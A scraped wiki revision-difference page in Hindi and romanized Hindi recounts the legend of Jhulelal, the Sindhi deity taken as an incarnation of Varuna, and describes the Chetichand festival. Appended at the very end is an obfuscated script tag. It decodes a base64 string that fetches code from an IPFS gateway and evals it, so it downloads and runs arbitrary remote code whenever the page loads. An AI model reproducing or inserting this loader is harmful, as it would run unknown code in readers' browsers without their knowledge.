Difference between revisions of "झूलेलाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "वरूण" to "वरुण")
m (Text replace - "हिंदू" to "हिन्दू")
Line 9: Line 9:
 
उदेरोलाल ने किशोर अवस्था में ही अपना चमत्कारी पराक्रम दिखाकर जनता को ढाँढस बँधाया और यौवन में प्रवेश करते ही जनता से कहा कि बेखौफ अपना काम करे। उदेरोलाल ने बादशाह को संदेश भेजा कि शांति ही परम सत्य है। इसे चुनौती मान बादशाह ने उदेरोलाल पर आक्रमण कर दिया। बादशाह का दर्प चूर-चूर हुआ और पराजय झेलकर उदेरोलाल के चरणों में स्थान माँगा। '''उदेरोलाल ने सर्वधर्म समभाव का संदेश दिया'''। इसका असर यह हुआ कि मिरक शाह उदयचंद का परम शिष्य बनकर उनके विचारों के प्रचार में जुट गया। झूलेलाल जी की शक्ति से प्रभावित होकर ही मिरख शाह ने अमन का रास्ता अपनाकर बाद में [[कुरुक्षेत्र]] में एक ऐसा भव्य मंदिर बनाकर दिया, जो आज भी हिन्दू-मुस्लिम एकता का प्रतीक और पवित्र स्थान माना जाता है। पाकिस्तान में झूलेलाल जी को जिंद पीर और लालशाह के नाम से जाना जाता है।
 
उदेरोलाल ने किशोर अवस्था में ही अपना चमत्कारी पराक्रम दिखाकर जनता को ढाँढस बँधाया और यौवन में प्रवेश करते ही जनता से कहा कि बेखौफ अपना काम करे। उदेरोलाल ने बादशाह को संदेश भेजा कि शांति ही परम सत्य है। इसे चुनौती मान बादशाह ने उदेरोलाल पर आक्रमण कर दिया। बादशाह का दर्प चूर-चूर हुआ और पराजय झेलकर उदेरोलाल के चरणों में स्थान माँगा। '''उदेरोलाल ने सर्वधर्म समभाव का संदेश दिया'''। इसका असर यह हुआ कि मिरक शाह उदयचंद का परम शिष्य बनकर उनके विचारों के प्रचार में जुट गया। झूलेलाल जी की शक्ति से प्रभावित होकर ही मिरख शाह ने अमन का रास्ता अपनाकर बाद में [[कुरुक्षेत्र]] में एक ऐसा भव्य मंदिर बनाकर दिया, जो आज भी हिन्दू-मुस्लिम एकता का प्रतीक और पवित्र स्थान माना जाता है। पाकिस्तान में झूलेलाल जी को जिंद पीर और लालशाह के नाम से जाना जाता है।
  
हिंदू धर्म में भगवान झूलेलाल को उदेरोलाल, लालसाँई, अमरलाल, जिंद पीर, लालशाह आदि नाम से जाना जाता है। इन्हें जल के देवता [[वरुण]] का अवतार माना जाता है। पाकिस्तान के सिंध प्रांत से भारत के अन्य प्रांतों में आकर बस गए हिंदुओं में झूलेलाल को पूजने का प्रचलन ज्यादा है। उपासक भगवान झूलेलाल जी को '''उदेरोलाल, घोड़ेवारो, जिन्दपीर, लालसाँई, पल्लेवारो, ज्योतिनवारो, अमरलाल''' आदि नामों से पूजते हैं। सिन्धु घाटी सभ्यता के निवासी चैत्र मास के चन्द्र दर्शन के दिन भगवान झूलेलाल जी का उत्सव संपूर्ण विश्व में चेटीचंड के त्योहार के रूप में परंपरागत हर्षोल्लास के साथ मनाते हैं।
+
हिन्दू धर्म में भगवान झूलेलाल को उदेरोलाल, लालसाँई, अमरलाल, जिंद पीर, लालशाह आदि नाम से जाना जाता है। इन्हें जल के देवता [[वरुण]] का अवतार माना जाता है। पाकिस्तान के सिंध प्रांत से भारत के अन्य प्रांतों में आकर बस गए हिंदुओं में झूलेलाल को पूजने का प्रचलन ज्यादा है। उपासक भगवान झूलेलाल जी को '''उदेरोलाल, घोड़ेवारो, जिन्दपीर, लालसाँई, पल्लेवारो, ज्योतिनवारो, अमरलाल''' आदि नामों से पूजते हैं। सिन्धु घाटी सभ्यता के निवासी चैत्र मास के चन्द्र दर्शन के दिन भगवान झूलेलाल जी का उत्सव संपूर्ण विश्व में चेटीचंड के त्योहार के रूप में परंपरागत हर्षोल्लास के साथ मनाते हैं।
  
 
<blockquote>भगवान झूलेलालजी को जल और ज्योति का अवतार माना गया है, इसलिए काष्ठ का एक मंदिर बनाकर उसमें एक लोटी से जल और ज्योति प्रज्वलित की जाती है और इस मंदिर को श्रद्धालु चेटीचंड के दिन अपने सिर पर उठाकर, जिसे बहिराणा साहब भी कहा जाता है, भगवान वरुण देव का स्तुतिगान करते हैं एवं समाज का परंपरागत नृत्य छेज करते हैं।</blockquote>
 
<blockquote>भगवान झूलेलालजी को जल और ज्योति का अवतार माना गया है, इसलिए काष्ठ का एक मंदिर बनाकर उसमें एक लोटी से जल और ज्योति प्रज्वलित की जाती है और इस मंदिर को श्रद्धालु चेटीचंड के दिन अपने सिर पर उठाकर, जिसे बहिराणा साहब भी कहा जाता है, भगवान वरुण देव का स्तुतिगान करते हैं एवं समाज का परंपरागत नृत्य छेज करते हैं।</blockquote>

Revision as of 03:29, 7 April 2010

jhoolelal ji / Jhulelal ji

thumb|200px|jhoolelal ji
Jhulelal Ji
siandhi samaj ke bhagavan jhoolelal ka avataran dharm ke lie hua hai. bhagavan jhoolelalaji ke avataran ki aisi hi ek katha hai. shatabdiyoan poorv sindh pradesh mean mirak shah nam ka ek raja raj karata tha. raja bahut danbhi tatha asahishnu prakriti ka tha. sadaiv apani praja par atyachar karata tha. is raja ke shasanakal mean saanskritik aur jivan-moolyoan ka koee mahatv nahian tha. poora sindh pradesh raja ke atyacharoan se trast tha. unhean koee aisa marg nahian mil raha tha jisase ve is kroor shasak ke atyacharoan se mukti pa sakean.

lokakathaoan mean yah bat lanbe samay se prachalit hai ki mirak shah ke atank ne jab janata ko manasik yantrana di to janata ne eeshvar ki sharan li. sindhu nadi ke tat par eeshvar ka smaran kiya tatha varundev uderolal ne jalapati ke roop mean matsy par savar hokar darshan die. tabhi namavani huee ki avatar hoga evan nasarapur ke thakur bhaee ratanaray ke ghar mata devaki ki kokh se upaja balak sabhi ki manokamana poorn karega.

samay ne karavat li aur nasarapur ke thakur ratanaray ke ghar mata devaki ne chaitr shukl 2 sanvat 1007 ko balak ko janm diya. balak ka nam udayachand rakha gaya. is chamatkarik balak ke janm ka hal jab mirak shah ko pata chala to usane apana aant manakar is balak ko samapt karavane ki yojana banaee. badashah ke senapati dal-bal ke sath ratanaray ke yahaan pahuanche aur balak ke apaharan ka prayas kiya, lekin jhoolelalaji ne apani divy shakti se badashah ke mahal par ag ka kahar barapa diya. mirak shah ki phauji takat pangu ho gee. unhean uderolal sianhasan par asin divy purush dikhaee diya. senapatiyoan ne badashah ko sab hakikat bayan ki. jab mahal bhayanak ag se jalane laga to badashah bhagakar jhoolelal ji ke charanoan mean gir p da.

uderolal ne kishor avastha mean hi apana chamatkari parakram dikhakar janata ko dhaandhas bandhaya aur yauvan mean pravesh karate hi janata se kaha ki bekhauph apana kam kare. uderolal ne badashah ko sandesh bheja ki shaanti hi param saty hai. ise chunauti man badashah ne uderolal par akraman kar diya. badashah ka darp choor-choor hua aur parajay jhelakar uderolal ke charanoan mean sthan maanga. uderolal ne sarvadharm samabhav ka sandesh diya. isaka asar yah hua ki mirak shah udayachand ka param shishy banakar unake vicharoan ke prachar mean jut gaya. jhoolelal ji ki shakti se prabhavit hokar hi mirakh shah ne aman ka rasta apanakar bad mean kurukshetr mean ek aisa bhavy mandir banakar diya, jo aj bhi hindoo-muslim ekata ka pratik aur pavitr sthan mana jata hai. pakistan mean jhoolelal ji ko jiand pir aur lalashah ke nam se jana jata hai.

hindoo dharm mean bhagavan jhoolelal ko uderolal, lalasaanee, amaralal, jiand pir, lalashah adi nam se jana jata hai. inhean jal ke devata varun ka avatar mana jata hai. pakistan ke siandh praant se bharat ke any praantoan mean akar bas ge hianduoan mean jhoolelal ko poojane ka prachalan jyada hai. upasak bhagavan jhoolelal ji ko uderolal, gho devaro, jindapir, lalasaanee, pallevaro, jyotinavaro, amaralal adi namoan se poojate haian. sindhu ghati sabhyata ke nivasi chaitr mas ke chandr darshan ke din bhagavan jhoolelal ji ka utsav sanpoorn vishv mean chetichand ke tyohar ke roop mean paranparagat harshollas ke sath manate haian.

bhagavan jhoolelalaji ko jal aur jyoti ka avatar mana gaya hai, isalie kashth ka ek mandir banakar usamean ek loti se jal aur jyoti prajvalit ki jati hai aur is mandir ko shraddhalu chetichand ke din apane sir par uthakar, jise bahirana sahab bhi kaha jata hai, bhagavan varun dev ka stutigan karate haian evan samaj ka paranparagat nrity chhej karate haian.

siandhiyoan ka sabase bada parv

jhoolelal mahotsav siandhi samaj ka sabase bada parv mana jata hai. jhoolelal bhagavan varunadev ka avataran hai jo ki bhaktoan ke sabhi kashtoan ko door karate haian. jo bhi 4 din tak vidhi- vidhan se bhagavan jhoolelal ki pooja-archana karata hai, vah sabhi duahkhoan se door ho jata hai. siandhi samaj ka sabase bada dharmik ayojan jhoolelal mahotsav mana jata hai. jhoolelal utsav chetichand, jise sindhi samaj sindhi divas ke roop mean manata chala a raha hai, par samaj ki vibhajak rekhaean samapt ho jati haian. yah sarvadharm samabhav ka pratik hai.

any liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>